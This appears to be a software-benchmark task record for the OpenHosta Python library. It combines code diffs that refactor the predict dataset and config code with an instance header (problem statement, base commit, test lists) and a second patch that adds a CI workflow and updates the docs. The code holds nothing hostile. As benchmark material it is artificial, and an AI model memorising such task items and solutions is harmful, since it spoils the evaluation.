+ logger.log_custom("Dataset", f"found at {config.dataset_path}", color=ANSIColor.BRIGHT_GREEN, level=2)
+ dataset = HostaDataset.from_files(path=config.dataset_path, source_type=None, log=logger)
else :
- if verbose == 2:
- print(f"[\033[93mDataset\033[0m] not found, generate data")
- dataset = generate_data(func, oracle, verbose)
- dataset.save(os.path.join(memory.predict_dir, "generated_data.csv"), SourceType.CSV)
- if verbose == 2:
- print(f"[\033[92mDataset\033[0m] generated!")
- dataset.encode(max_tokens=10)
- dataset.tensorify()
- dataset.save_data(memory.data.path)
+ logger.log_custom("Dataset", "not found, generate data", color=ANSIColor.BRIGHT_YELLOW, level=2)
+ dataset = _generate_data(func, oracle, config, logger)
+ save_path = os.path.join(memory.predict_dir, "generated_data.csv")
+ dataset.save(save_path, SourceType.CSV)
+ logger.log_custom("Dataset", f"generated and saved at {save_path}", color=ANSIColor.BRIGHT_GREEN, level=2)
+
if config.batch_size is None:
- config.batch_size = int(0.05 * len(dataset.data)) if 0.05 * len(dataset.data) > 1 else len(dataset.data)
- train_set, val_set = dataset.convert_data(batch_size=config.batch_size, shuffle=True, train_set_size=0.8)
+ config.batch_size = max(1, min(16384, int(0.05 * len(dataset.data))))
- if verbose == 2:
- print(f"[\033[92mDataset\033[0m] processed and saved at {memory.data.path}")
+ dataset.encode(max_tokens=config.max_tokens, inference=False, func=func, dictionary_path=memory.dictionary.path)
+ if config.normalize:
+ dataset.normalize_data(memory.normalization)
+ dataset.tensorize()
+ dataset.save_data(memory.data.path)
+
+ train_set, val_set = dataset.to_dataloaders(batch_size=config.batch_size, shuffle=True, train_ratio=0.8)
+
+ logger.log_custom("Dataset", f"processed and saved at {memory.data.path}", color=ANSIColor.BRIGHT_GREEN, level=2)
return train_set, val_set
-def generate_data(func: Func, oracle: Optional[Union[Model, HostaDataset]], verbose: int) -> HostaDataset:
+def _generate_data(func: Func, oracle: Optional[Union[Model, HostaDataset]], config: PredictConfig, logger: Logger) -> HostaDataset:
"""
Generate data for training.
"""
+ request_amounts = int(config.generated_data / 100) if config.generated_data > 100 else 1
+
data = LLMSyntheticDataGenerator.generate_synthetic_data(
func=func,
- request_amounts=3, # TODO: make it a parameter
- examples_in_req=80, # TODO: make it a parameter
+ logger=logger,
+ request_amounts=request_amounts,
+ examples_in_req=int(config.generated_data / request_amounts),
model=oracle if oracle is not None else DefaultModel().get_default_model()
)
- return HostaDataset.from_list(data, verbose)
+ return HostaDataset.from_list(data, logger)
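The batching arithmetic that this hunk bakes into `prepare_dataset` and `_generate_data` can be checked in isolation. Below is a standalone sketch (the function names are illustrative, not part of OpenHosta's API): one generation request per 100 examples, and a default batch size of 5% of the dataset clamped to the range [1, 16384].

```python
# Standalone sketch of the arithmetic used in the patch above.
# Function names here are illustrative, not part of OpenHosta's API.

def split_generation(generated_data: int) -> tuple:
    # One LLM request per 100 examples, spread evenly across requests.
    request_amounts = int(generated_data / 100) if generated_data > 100 else 1
    examples_in_req = int(generated_data / request_amounts)
    return request_amounts, examples_in_req

def default_batch_size(n_samples: int) -> int:
    # 5% of the dataset, clamped to [1, 16384] as in prepare_dataset.
    return max(1, min(16384, int(0.05 * n_samples)))

print(split_generation(250))      # (2, 125)
print(default_batch_size(10))     # 1 (tiny datasets still get a batch)
print(default_batch_size(10**7))  # 16384 (upper clamp)
```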
diff --git a/src/OpenHosta/exec/predict/predict_config.py b/src/OpenHosta/exec/predict/predict_config.py
index 645b7ca..997aea3 100644
--- a/src/OpenHosta/exec/predict/predict_config.py
+++ b/src/OpenHosta/exec/predict/predict_config.py
@@ -1,50 +1,45 @@
from typing import Optional
-from .model.neural_network_types import ArchitectureType
-
class PredictConfig:
def __init__(self,
- model_type: ArchitectureType = None,
name: str = None,
path: str = None,
- version: str = None,
- complexity: int = 4,
- max_tokens: int = 10,
+ complexity: int = 5,
+ growth_rate: float = 1.5,
+ coef_layers : int = 100,
+ normalize: bool = False,
epochs: Optional[int] = None,
batch_size: Optional[int] = None,
- learning_rate: Optional[float] = None,
- get_loss: Optional[float] = None,
- dataset_path: Optional[str] = None
- ):
- self.model_type: ArchitectureType = model_type
-
+ max_tokens: int = 1,
+ dataset_path: Optional[str] = None,
+ generated_data: Optional[int] = 100,
+ ):
self.name: str = name
self.path: str = path
- self.version: str = version
-
self.complexity: int = complexity
- self.max_tokens: int = max_tokens
-
- self.batch_size: int = batch_size
+ self.growth_rate: float = growth_rate
+ self.coef_layers: int = coef_layers
+ self.normalize: bool = normalize
self.epochs: int = epochs
- self.learning_rate: float = learning_rate
- self.get_loss: float = get_loss
+ self.batch_size: int = batch_size
+ self.max_tokens: int = max_tokens
self.dataset_path: str = dataset_path
+ self.generated_data: int = generated_data
def to_json(self):
return f"""{{
"name": "{self.name}",
- "model_type": "{self.model_type}",
- "weight_path": "{self.path}",
- "version": "{self.version}",
+ "path": "{self.path}",
"complexity": {self.complexity},
- "max_tokens": {self.max_tokens},
+ "growth_rate": {self.growth_rate},
+ "coef_layers": {self.coef_layers},
+ "normalize": {self.normalize},
"epochs": {self.epochs},
"batch_size": {self.batch_size},
- "learning_rate": {self.learning_rate},
- "get_loss": {self.get_loss},
+ "max_tokens": {self.max_tokens},
"dataset_path": "{self.dataset_path}",
+ "generated_data": {self.generated_data}
}}"""
@staticmethod
@@ -53,14 +48,14 @@ def from_json(json_str: str):
data = json.loads(json_str)
return PredictConfig(
name=data["name"],
- model_type=ArchitectureType(data["model_type"]),
path=data["path"],
- version=data["version"],
complexity=data["complexity"],
- max_tokens=data["max_tokens"],
+ growth_rate=data["growth_rate"],
+ coef_layers=data["coef_layers"],
+ normalize=data["normalize"],
epochs=data["epochs"],
batch_size=data["batch_size"],
- learning_rate=data["learning_rate"],
- get_loss=data["get_loss"],
+ max_tokens=data["max_tokens"],
dataset_path=data["dataset_path"],
+ generated_data=data["generated_data"]
)
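One caveat with the `to_json` rewrite above: the hand-built f-string interpolates Python literals, so defaults such as `normalize=False` or `epochs=None` are emitted as `False`/`None`, which `json.loads` rejects. A `json.dumps`-based round trip avoids this; here is a minimal standalone sketch (a simplified stand-in class, not the actual `PredictConfig`):

```python
import json

class ConfigSketch:
    """Simplified stand-in for a config class with a JSON round trip."""

    def __init__(self, name=None, complexity=5, normalize=False, epochs=None):
        self.name = name
        self.complexity = complexity
        self.normalize = normalize
        self.epochs = epochs

    def to_json(self) -> str:
        # json.dumps emits valid JSON (false/null), unlike a raw f-string.
        return json.dumps(self.__dict__)

    @staticmethod
    def from_json(json_str: str) -> "ConfigSketch":
        return ConfigSketch(**json.loads(json_str))

cfg = ConfigSketch(name="demo", normalize=True)
restored = ConfigSketch.from_json(cfg.to_json())
print(restored.name, restored.normalize, restored.epochs)  # demo True None
```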
diff --git a/src/OpenHosta/exec/predict/predict_memory.py b/src/OpenHosta/exec/predict/predict_memory.py
index 74ebd04..90469cd 100644
--- a/src/OpenHosta/exec/predict/predict_memory.py
+++ b/src/OpenHosta/exec/predict/predict_memory.py
@@ -1,19 +1,26 @@
import os
+from dataclasses import dataclass
from enum import Enum
-from typing import Optional, Dict, NamedTuple
+from typing import Optional, Dict
from ...core.memory import HostaMemory
-# 1. Structures de base
-File = NamedTuple("File", [("exist", bool), ("path", str)])
+
+@dataclass
+class File:
+ exist: bool
+ path: str
+
class PredictFileType(Enum):
"""Enumaration for different types of files in the prediction memory."""
ARCHITECTURE = "model.json"
WEIGHTS = "weights.pth"
- DICTIONARY = "dictionary.txt"
+ DICTIONARY = "dictionary.json"
DATA = "data.json"
SUMMARY = "summary.txt"
+ NORMALIZATION = "normalization.json"
+
class PredictMemory(HostaMemory):
"""
@@ -22,6 +29,7 @@ class PredictMemory(HostaMemory):
    It uses the File structure to store the status of each file and its path.
"""
+
def __init__(self, base_path: Optional[str] = None, *, name: str = None, **kwargs):
super().__init__(base_path=base_path, **kwargs)
if name is None:
@@ -41,11 +49,10 @@ def load(base_path: Optional[str] = None, name: str = None) -> 'PredictMemory':
PredictMemory instance.
"""
memory = PredictMemory(base_path=base_path, name=name)
- memory._initialize_predict_directory
+ memory._initialize_predict_directory()
memory._check_files()
return memory
- @property
def _initialize_predict_directory(self) -> None:
"""
Initializes the directory and file structure for predictions.
@@ -67,16 +74,25 @@ def _check_files(self) -> None:
self.files[file_type] = File(exist=exists, path=path)
@property
- def architecture(self) -> File: return self.files[PredictFileType.ARCHITECTURE]
+ def architecture(self) -> File:
+ return self.files[PredictFileType.ARCHITECTURE]
+
+ @property
+ def weights(self) -> File:
+ return self.files[PredictFileType.WEIGHTS]
@property
- def weights(self) -> File: return self.files[PredictFileType.WEIGHTS]
+ def data(self) -> File:
+ return self.files[PredictFileType.DATA]
@property
- def data(self) -> File: return self.files[PredictFileType.DATA]
+ def summary(self) -> File:
+ return self.files[PredictFileType.SUMMARY]
@property
- def summary(self) -> File: return self.files[PredictFileType.SUMMARY]
+ def dictionary(self) -> File:
+ return self.files[PredictFileType.DICTIONARY]
@property
- def dictionary(self) -> File: return self.files[PredictFileType.DICTIONARY]
+ def normalization(self) -> File:
+ return self.files[PredictFileType.NORMALIZATION]
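The `load` fix in this hunk is easy to miss: `memory._initialize_predict_directory` without parentheses only executed because the method was wrongly declared a `@property`; once the decorator is removed, the bare attribute access becomes a silent no-op, hence the added `()`. A minimal illustration of the pitfall:

```python
class Demo:
    def __init__(self):
        self.initialized = False

    def initialize(self):
        self.initialized = True

d = Demo()
d.initialize        # bare method reference: evaluates to a bound method, runs nothing
assert d.initialized is False
d.initialize()      # the actual call
assert d.initialized is True
```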
diff --git a/src/OpenHosta/utils/torch_nn_utils.py b/src/OpenHosta/utils/torch_nn_utils.py
index 0763130..ea38199 100644
--- a/src/OpenHosta/utils/torch_nn_utils.py
+++ b/src/OpenHosta/utils/torch_nn_utils.py
@@ -1,4 +1,4 @@
-from typing import Union
+from typing import get_origin, Literal, Union
from torch import nn
from torch import optim
@@ -242,9 +242,10 @@ def custom_optimizer_to_pytorch(optimizer_algorithm: OptimizerAlgorithm, model:
def type_size(data, tokens_size=10):
"""
- Calculate the _inputs/_outputs size based on the type of the _inputs data.
+ Calculate the inputs/outputs size based on the type of the inputs data.
Parameters:
+    tokens_size: The size of the tokens in the input data.
data: Can be of type int, float, list, tuple, numpy array, PyTorch tensor, set, dict, or string.
Returns:
@@ -266,7 +267,7 @@ def type_size(data, tokens_size=10):
return sum(type_size(item) for item in data)
elif data is dict:
return sum(type_size(k) + type_size(v) for k, v in data.items())
- # elif isinstance(data, typing._GenericAlias) and get_origin(data) is Literal:
- # return len(data.__args__)
+ elif get_origin(data) is Literal:
+ return len(data.__args__)
else:
raise TypeError(f'Unsupported data type: {type(data)}')
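The restored `Literal` branch above relies on `typing.get_origin`; the check can be exercised in isolation, without torch:

```python
from typing import Literal, get_args, get_origin

Color = Literal["red", "green", "blue"]

# get_origin unwraps the subscripted form back to Literal itself,
# and get_args returns the allowed values, so their count is the size.
assert get_origin(Color) is Literal
assert len(get_args(Color)) == 3
assert get_origin(int) is None  # plain types have no origin
```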
problem_statement: Classification handling for the encoder in predict; Feature/normalization
created_at: 2024-11-27T16:21:43 | version: 0.0 | FAIL_TO_PASS: [] | PASS_TO_PASS: []
repo: hand-e-fr/OpenHosta | instance_id: hand-e-fr__OpenHosta-147 | base_commit: 218a0a45b6bcf5217abe3219e1136a2c76c47657
diff --git a/.flake8 b/.flake8
deleted file mode 100644
index 93c3a6e..0000000
--- a/.flake8
+++ /dev/null
@@ -1,14 +0,0 @@
-[flake8]
-
-filename =
- src/OpenHosta.py
- src/setup.py
-extend-exclude =
- src/__pycache__/
- jipynb/
-max_line_length = 99
-ident-size = 3
-disable_noqa = True
-statistics = True
-output-file = errors.txt
-doctests = True
\ No newline at end of file
diff --git a/.github/workflows/quality_check.yml b/.github/workflows/quality_check.yml
new file mode 100644
index 0000000..c96d87c
--- /dev/null
+++ b/.github/workflows/quality_check.yml
@@ -0,0 +1,123 @@
+name: Python Quality Check
+
+on:
+ push:
+ branches:
+ - main
+ - dev
+ pull_request:
+ branches:
+ - main
+ - dev
+
+jobs:
+ setup:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+
+ - name: Set up Python 3.12
+ uses: actions/setup-python@v5
+ with:
+ python-version: "3.12"
+
+ - name: Install dependencies
+ run: |
+ python -m pip install --upgrade pip
+ pip install .[dev,pydantic]
+
+ - name: Cache dependencies
+ uses: actions/cache@v4
+ with:
+ path: ~/.cache/pip
+ key: ${{ runner.os }}-pip-${{ hashFiles('**/requirements.txt') }}
+ restore-keys: |
+ ${{ runner.os }}-pip-
+
+ code-quality:
+ needs: setup
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: actions/setup-python@v5
+ with:
+ python-version: "3.12"
+
+ - name: Install dependencies
+ run: pip install .[dev,pydantic]
+
+ - name: Run autopep8
+ run: python -m autopep8 --recursive --in-place src/OpenHosta
+
+ - name: Run pyflakes
+ run: python -m pyflakes src/OpenHosta/
+ continue-on-error: true
+
+ - name: Run isort
+ run: python -m isort --check-only --diff src/OpenHosta
+ continue-on-error: true
+
+ static-analysis:
+ needs: setup
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: actions/setup-python@v5
+ with:
+ python-version: "3.12"
+
+ - name: Install dependencies
+ run: pip install .[dev,pydantic]
+
+ - name: Run mypy
+ run: python -m mypy src/OpenHosta
+ continue-on-error: true
+
+ - name: Run pylint
+ run: python -m pylint --rcfile=pyproject.toml src/OpenHosta
+ continue-on-error: true
+
+ - name: Run bandit
+ run: python -m bandit -c pyproject.toml -r src/OpenHosta -f txt
+ continue-on-error: true
+
+ unit-tests:
+ needs: setup
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: actions/setup-python@v5
+ with:
+ python-version: "3.12"
+
+ - name: Install dependencies
+ run: pip install .[tests]
+
+ - name: Run unit tests
+ run: python -m pytest tests/unitTests -v --cov=OpenHosta.core
+
+ functional-tests:
+ needs: setup
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: actions/setup-python@v5
+ with:
+ python-version: "3.12"
+
+ - name: Install dependencies
+ run: pip install .[tests]
+
+ - name: Run functional tests
+ run: python -m pytest tests/functionnalTests -v --cov=OpenHosta
+
+ notify:
+ needs: [code-quality, static-analysis, unit-tests, functional-tests]
+ runs-on: ubuntu-latest
+ if: always()
+ steps:
+ - name: Check for failures
+ if: contains(needs.*.result, 'failure')
+ run: |
+ echo "Some jobs have failed. Check the logs above for more details."
+ exit 1
\ No newline at end of file
diff --git a/.gitignore b/.gitignore
index 553075f..8b11efb 100644
--- a/.gitignore
+++ b/.gitignore
@@ -15,4 +15,9 @@ __hostacache__/
.pytest_cache
src/OpenHosta.egg-info
build/
-.pypirc
\ No newline at end of file
+.pypirc
+mypy/
+.mypy_cache/
+linter.py
+*pt.py
+tests/reports/*report.txt
\ No newline at end of file
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 933d490..d2f7511 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,36 @@ All significant changes to this project will be documented in this file.
---
+## **v2.0-beta2**
+- **Added**
+ - Introduced `BaseEncoder` as an Abstract Base Class (ABC) for all specific encoders, providing a standardized interface.
+ - Added `BoolEncoder` to handle encoding of boolean values.
+ - Introduced `PredictConfig` data class to encapsulate parameters for the `predict` function.
+ - Initial implementation of the `HostaCache` class in `core/cache.py` with generic type support.
+ - Initial implementation of the `ModelCachedData` and `HostaModelCache` classes in `predict/cache.py`.
+- **Changed**
+ - Refactored `IntEncoder` and `FloatEncoder` to inherit from `BaseEncoder` and implement the encode method.
+ - Updated `HostaEncoder` to use a dictionary (`self.encoders`) for mapping data types to their corresponding encoders. This allows for easier extension and maintenance.
+ - Improved type handling in `HostaEncoder.encode` method for better extensibility and readability.
+ - Refactored `predict` function to accept a single `PredictConfig` object instead of multiple parameters. This change improves readability and maintainability of the function.
+- **Fixed**
+ - Enhanced exception handling in `FloatEncoder` to provide more informative error messages.
+ - Removed unnecessary constructors from encoder classes, streamlining the code.
+
+## **v2.0-beta1**
+
+- **Features**
+ - Added `max_tokens` args for emulate
+ - Added `use_locals/self_as_ctx` args for emulate for clarity and modularity
+  - `thought` is now used to add a chain of thoughts in an emulated function
+ - `PromptManager` is now available for users to change all meta-prompt.
+
+- **Changes**
+  - `thought` function became `thinkof`
+  - `suggest` is removed
+  - `creativity` became `temperature` and `diversity` became `top_p`
+ - There's no more `hostacache` for emulated functions
+
## **OpenHosta v1.2.1 - 10/14/24**
- **Fixes**
diff --git a/Makefile b/Makefile
index e331e08..ac0c0cd 100644
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,4 @@
+
PACKAGE_NAME := OpenHosta
SRC_DIR := src/OpenHosta
TEST_DIR := tests
@@ -50,9 +51,6 @@ help:
install: all
@$(L_SHELL) $(WRITE) '$(TAG) [INSTALL]' $(COLOR)
- @$(L_SHELL) $(WRITE) '$(TAG) Installing dependencies...' $(COLOR)
- @$(PIP) install requirements.txt > $(NULL_DEVICE)
- @$(PIP) install requirements-dev.txt > $(NULL_DEVICE)
@$(L_SHELL) $(WRITE) '$(TAG) Installing package: $(PACKAGE_NAME)...' $(COLOR)
@$(PIP) install . > $(NULL_DEVICE)
@$(L_SHELL) $(WRITE) '$(TAG) Succesfully installed $(PACKAGE_NAME) !' $(COLOR)
@@ -64,29 +62,6 @@ build: clean
upload: build
$(PYTHON) -m twine upload dist/* --verbose
-ftests: clean
- @$(L_SHELL) $(WRITE) '$(TAG) Installing package: $(PACKAGE_NAME)...' $(COLOR)
- @$(PIP) install . > $(NULL_DEVICE)
- @$(L_SHELL) $(WRITE) '$(TAG) Running functionnal tests...' $(COLOR)
- @$(L_SHELL) $(SET_ENV)
- @-$(L_SHELL) "$(PYTEST) .\\tests\\functionnalTests\\test_mandatory.py $(ARGS)"
- @$(L_SHELL) $(UNSET_ENV)
- @$(L_SHELL) $(WRITE) '$(TAG) Uninstalling package: $(PACKAGE_NAME)...' $(COLOR)
- @$(PIP) uninstall -y OpenHosta > $(NULL_DEVICE)
- @$(L_SHELL) $(WRITE) '$(TAG) Succesfully ran functionnal tests !' $(COLOR)
-
-utests: clean
- @$(L_SHELL) $(WRITE) '$(TAG) Installing package: $(PACKAGE_NAME)...' $(COLOR)
- @$(PIP) install . > $(NULL_DEVICE)
- @$(L_SHELL) $(WRITE) '$(TAG) Running unit tests...' $(COLOR)
- @$(L_SHELL) $(SET_ENV)
- @-$(L_SHELL) "$(PYTEST) .\\tests\\unitTests\\test_exec.py $(ARGS)"
- @$(L_SHELL) $(UNSET_ENV)
- @$(L_SHELL) $(WRITE) '$(TAG) Uninstalling package: $(PACKAGE_NAME)...' $(COLOR)
- @$(PIP) uninstall -y OpenHosta > $(NULL_DEVICE)
- @$(L_SHELL) $(WRITE) '$(TAG) Succesfully ran unit tests !' $(COLOR)
-
-
clean:
@$(L_SHELL) $(WRITE) '$(TAG) [CLEAN]' $(COLOR)
@$(L_SHELL) $(WRITE) '$(TAG) Cleaning repository...' $(COLOR)
@@ -96,6 +71,8 @@ clean:
@$(L_SHELL) $(FIND) 'dist' | $(RM)
@$(L_SHELL) $(FIND) 'OpenHosta.egg-info' | $(RM)
@$(L_SHELL) $(FIND) '.pytest_cache' | $(RM)
+ @$(L_SHELL) $(FIND) '.mypy_cache' | $(RM)
+ @$(L_SHELL) $(FIND) '.coverage' | $(RM)
@$(L_SHELL) $(WRITE) '$(TAG) Uninstalling package: $(PACKAGE_NAME)...' $(COLOR)
@$(PIP) uninstall -y OpenHosta > $(NULL_DEVICE)
@$(L_SHELL) $(CLEAR)
diff --git a/README.md b/README.md
index e0693af..d802994 100644
--- a/README.md
+++ b/README.md
@@ -1,5 +1,5 @@
# OpenHosta
-v1.2.1 - Opensource Project
+v2.0-beta2 - Opensource Project
**- The future of development is human -**
@@ -12,11 +12,7 @@ For this project, we have adopted a [Code of Conduct](CODE_OF_CONDUCT.md) to ens
- [OpenHosta](#openhosta)
- [Table of Content](#table-of-content)
- [How to install OpenHosta ?](#how-to-install-openhosta-)
- - [Prerequisites](#prerequisites)
- - [Installation](#installation)
- - [Via pip](#via-pip)
- - [Via git (Developper version)](#via-git-developper-version)
- - [Example](#example)
+ - [Example](#example)
- [Further information](#further-information)
- [Contributing](#contributing)
- [License](#license)
@@ -26,81 +22,21 @@ For this project, we have adopted a [Code of Conduct](CODE_OF_CONDUCT.md) to ens
## How to install OpenHosta ?
-### Prerequisites
+You can install OpenHosta either via pip or via GitHub.
-1. **Python 3.10 | 3.11 | 3.12**
- - Download and install Python from [python.org](https://www.python.org/downloads/).
-
-2. **pip**
- - pip is generally included with Python. Verify its installation with:
- ```sh
- pip --version
- ```
-
-3. **Git**
- - Download and install Git from [git-scm.com](https://git-scm.com/downloads).
-
-4. **Virtual Environment (optional)**
- - Create and activate a virtual environment:
- ```bash
- python -m venv env
- ```
- - Activate the virtual environement:
- ```bash
- .\env\Scripts\activate # Windows
- source env/bin/activate # macOS/Linux
- ```
-
-5. **API Key**
- - **API Key**: Log in to your OpenAI account from [openai.com](https://openai.com/), then create your API key. For further information, you can check this [tuto](https://help.openai.com/en/articles/4936850-where-do-i-find-my-openai-api-key).
-
-### Installation
-
-#### Via pip
-
-1. Run the following command to install OpenHosta directly:
-
```sh
-pip install openhosta
+pip install OpenHosta[all]
```
-2. After the installation, you can verify that OpenHosta is installed correctly by running:
+or
```sh
-pip show openhosta
-```
-
-#### Via git (Developper version)
-
-1. Clone the **Git repository** to your local machine using the following command:
-
-```bash
git clone [email protected]:hand-e-fr/OpenHosta.git
```
-2. Navigate to the **directory** of the cloned project:
-
-```bash
-cd OpenHosta
-```
-
-3. Ensure you have installed the necessary **dependencies** before starting.
-
-```bash
-pip install .
-```
-
-4. Check that you have the correct version from Python.
-
-```python
-import OpenHosta
-
-OpenHosta.__version__
-```
-
-This way you have all the documentation and source code to understand our project
+**See the full installation guide [here](docs/installation.md)**
-### Example
+## Example
```python
from OpenHosta import emulate, config
@@ -116,7 +52,7 @@ def translate(text:str, language:str)->str:
result = translate("Hello World!", "French")
print(result)
```
-You check OpenHosta's [documentation](doc/Docs.md) for more detailled informations or exemple
+You can check OpenHosta's [documentation](docs/doc.md) for more detailed information or examples
## Further information
diff --git a/doc/PMAC.md b/docs/PMAC.md
similarity index 100%
rename from doc/PMAC.md
rename to docs/PMAC.md
diff --git a/doc/Docs.md b/docs/doc.md
similarity index 51%
rename from doc/Docs.md
rename to docs/doc.md
index d026261..e363e28 100644
--- a/doc/Docs.md
+++ b/docs/doc.md
@@ -1,7 +1,7 @@
# Documentation
___
-Documentation for version: **1.2.1
+Documentation for version: **2.0-beta2**
Welcome to **OpenHosta** documentation :). Here you'll find all the **explanations** you need to understand the library, as well as **usage examples** and advanced **configuration** methods for the most complex tasks. You'll also find explanations of the source code for those interested in **contributing** to this project. Check the [Google Colab](https://colab.research.google.com/drive/1XKrPrhLlYJD-ULTA8WHzIMqTXkb3iIpb?usp=sharing) **test files** to help you take your first steps in discovering OpenHosta.
@@ -9,9 +9,9 @@ For this project, we have adopted a [Code of Conduct](CODE_OF_CONDUCT.md) to ens
___
-### Introduction
+## Introduction
-#### First Step
+### First Step
OpenHosta is a **Python library** designed to facilitate the integration of **LLMs** into the developer's environment, by adding a layer to the Python programming language without distorting it. It is based on the [**PMAC**](PMAC.md) concept, reimagining the **compilation** process in languages. All our functionalities respect the **syntax and paradigm** of this language.
@@ -23,7 +23,7 @@ We've already mentioned a few concepts about **AI** or **computer science**. If
Finally, if you like the project and are thinking of contributing, please refer to our [Contribution Guide](CONTRIBUTING.md)
-#### Why use OpenHosta?
+### Why use OpenHosta?
- **Beyond programming**
@@ -39,7 +39,7 @@ We are an Open-Source project. We believe this philosophy contributes to the **s
---
-##### *Legal Framework*
+### *Legal Framework*
The use of AI in a production context raises important **legal** issues. It is essential to take these issues into account to ensure the compliance of your **deployment**.
@@ -60,52 +60,41 @@ For more information, please consult the following links:
Let's **get started**! First here's the **table of contents** to help you navigate through the various sections of the documentation.
-### Table of Content
+## Table of Content
- [Documentation](#documentation)
- - [Introduction](#introduction)
- - [First Step](#first-step)
- - [Why use OpenHosta?](#why-use-openhosta)
- - [*Legal Framework*](#legal-framework)
- - [Table of Content](#table-of-content)
- - [Features](#features)
+ - [Introduction](#introduction)
+ - [First Step](#first-step)
+ - [Why use OpenHosta?](#why-use-openhosta)
+ - [*Legal Framework*](#legal-framework)
+ - [Table of Content](#table-of-content)
+ - [Get Started](#get-started)
- [OpenHosta Example](#openhosta-example)
- - [Get Started](#get-started)
- - [Librairie Import](#librairie-import)
- - [Basic Setup](#basic-setup)
+ - [Install OpenHosta](#install-openhosta)
+ - [Librairie Import](#librairie-import)
+ - [Basic Setup](#basic-setup)
- [`emulate` Function](#emulate-function)
- - [Supported types \& Pydantic](#supported-types--pydantic)
+ - [Supported types \& Pydantic](#supported-types--pydantic)
- [Integration Details](#integration-details)
- - ["suggest" Function](#suggest-function)
- - [Usage](#usage)
- - [Output Examples](#output-examples)
- - [`predict` Function](#predict-function)
- - [How `predict` Works](#how-predict-works)
- - [Limitations and Known Issues](#limitations-and-known-issues)
- - [`predict` Function Parameters](#predict-function-parameters)
- - [Additional `predict` Functionalities](#additional-predict-functionalities)
- - [1. `retrain`](#1-retrain)
- - [Example:](#example)
- - [2. `continue_train`](#2-continue_train)
- - [Example:](#example-1)
- - [3. `emulate`](#3-emulate)
- - [Example:](#example-2)
- - [TrainingSet Management](#trainingset-management)
- - [Example:](#example-3)
- - [Training Output of predict](#training-output-of-predict)
- - [`thought` Function](#thought-function)
- - [`example` Function](#example-function)
- - [Advanced configuration](#advanced-configuration)
- - [Introduction](#introduction-1)
+ - [Body Functions](#body-functions)
+ - [`Example`](#example)
+ - [`Thought`](#thought)
+ - [`thinkof` Function](#thinkof-function)
+ - [`ask` function](#ask-function)
+ - [Advanced configuration](#advanced-configuration)
+ - [Models](#models)
- [Inheriting from the Model Class](#inheriting-from-the-model-class)
- [Custom LLM Call Function](#custom-llm-call-function)
- [Custom Response Handling Function](#custom-response-handling-function)
- [Create a new instance](#create-a-new-instance)
- - [References](#references)
+ - [Prompts](#prompts)
+ - [Edit the prompt](#edit-the-prompt)
+ - [Show me the prompt !](#show-me-the-prompt-)
+ - [References](#references)
---
-## Features
+## Get Started
For each part, you'll find functional examples to illustrate the features. If you have any questions, don't hesitate to visit the “Discussion” tab on GitHub.
@@ -114,8 +103,6 @@ For each part, you'll find functional examples to illustrate the features. If yo
```python
from OpenHosta import emulate, config
-config.set_default_apiKey("put-your-api-key-here")
-
def translate(text:str, language:str)->str:
"""
This function translates the text in the “text” parameter into the language specified in the “language” parameter.
@@ -126,21 +113,22 @@ result = translate("Hello World!", "French")
print(result)
```
-### Get Started
+### Install OpenHosta
+
+The installation process is described step-by-step in the [installation guide](installation.md).
Once you've installed the OpenHosta library, you're ready to get started. We'll import the library and then look at the basic configurations.
-#### Librairie Import
+### Librairie Import
```python
from OpenHosta import *
```
We recommend this import method, as it gives you all the important and stable features:
- - Emulate function
- - Thought function
- - Example function
- - \_\_suggest\_\_ attributes
+ - All the tools to emulate Python functions (`emulate` and all its attached functions)
+ - All the tools to create specialized models (`predict` and all its attached functions)
+ - All the other features useful in `OpenHosta` (`ask`, `thinkof`, tools for data generation...)
- Configuration tools
But you can also import modules one by one.
@@ -149,19 +137,21 @@ But you can also import modules one by one.
from OpenHosta import emulate, config
```
-#### Basic Setup
+### Basic Setup
This section focuses on the *config* module.
As previously mentioned, a default model is automatically assigned: GPT-4o. To use it, you first need to enter your API key.
+There are two ways to do this: either set an environment variable (see the [Installation guide](installation.md)), or set it with the following function:
+
```python
config.set_default_apiKey("put-your-api-key-here")
```
Once you've done that, all OpenHosta's features are ready to use.
-If you wish to use another model, you'll need to create an instance of the *Model* class.
+If you want to use another model, you'll need to create an instance of the *Model* class.
```python
my_model = config.Model(
@@ -171,7 +161,7 @@ my_model = config.Model(
)
```
-Note that some features like `thought` or `__suggest__` specifically use the default model. So if you want to change it, use this.
+Note that some features like `thinkof` or `LLMSyntheticDataGenerator` specifically use the default model. So if you want to change it, use this:
```python
config.set_default_model(my_model)
@@ -181,13 +171,16 @@ config.set_default_model(my_model)
The *emulate* function is the main feature of OpenHosta. This is the function that allows you to emulate functions with AI, i.e. the instructions will be executed in an LLM and not directly in your computer. Here's how to use it.
-Emulate is used inside a function or a class method, after the “return”. What it does is take the function's documentation as a “prompt” to emulate it. The way in which you write the function is therefore crucial to ensure that “emulate” works properly.
+Emulate is used inside a function or a class method. It takes the function's documentation as a “prompt” to emulate it. The way in which you write the function is therefore crucial to ensure that “emulate” works properly.
Here's what you need to know:
- - **The function prototype** is one of the elements sent to LLM. Its different fields must therefore appear clearly. Give a meaningful and precise name to your function. It's also a good idea to specify the type of arguments and the type of return to reduce the uncertainty related to LLM.
-
+ - **The function prototype** is one of the elements sent to the LLM. Its different fields must therefore appear clearly. Give a meaningful and precise name to your function. It's also a good idea to annotate your function by specifying the type of arguments and the type of return. This gives the LLM the exact format in which it must respond, therefore enhancing its performance.
+   If you're not familiar with the Python annotation system, please check the [typing module documentation](https://docs.python.org/3/library/typing.html)
+
```python
-def function(a:int, b:dict)->str:
+from typing import List
+
+def example_function(a:int, b:str)->List[str]:
```
 - **The docstring** is the other key element. This is where you describe the behavior of the function. Be precise and concise. Describe the input parameters and the nature of the output, as in a docstring. Feel free to try out lots of things, prompt engineering is not a closed science. :)
@@ -215,16 +208,27 @@ def find_name_age(sentence:str, id:dict)->dict:
Note that, as seen above, you can pass a previously configured model as an emulate parameter.
